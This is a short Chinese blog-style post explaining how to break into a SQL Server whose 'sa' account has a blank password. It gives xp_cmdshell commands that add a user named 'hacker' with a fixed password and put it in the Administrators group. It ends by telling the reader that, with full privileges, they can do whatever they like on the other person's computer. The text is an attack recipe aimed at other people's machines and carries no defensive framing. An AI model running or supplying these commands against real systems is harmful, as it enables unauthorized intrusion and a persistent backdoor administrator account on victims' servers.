在新安装的SQL Server后,如果"sa"帐户,密码就为空,而且这个密码是SQL Server安全模块成员,享有最高的管理控制权,那么我们就可以用查询器或者OSQL登陆到对方的计算机上,前提是对方的数据库中xp_cmdshell stored procedure“扩展存储过程” 存在,默认是有的,(能让你这么容易的登陆上估计也不可能删除的)然后运行下面的命令:
Xp_cmdshell "net user hacker 123456 /ADD"(增加一个名字为hacker密码为123456的用户)然后在:Xp_cmdshell "net localgroup Administrators hacker /ADD"(给刚才增加的hacker用户,添加到Administrators组中)
然后做什么呢?这个问题自己想吧,有了最高权限,想做什么就做什么吧。
没有评论:
发表评论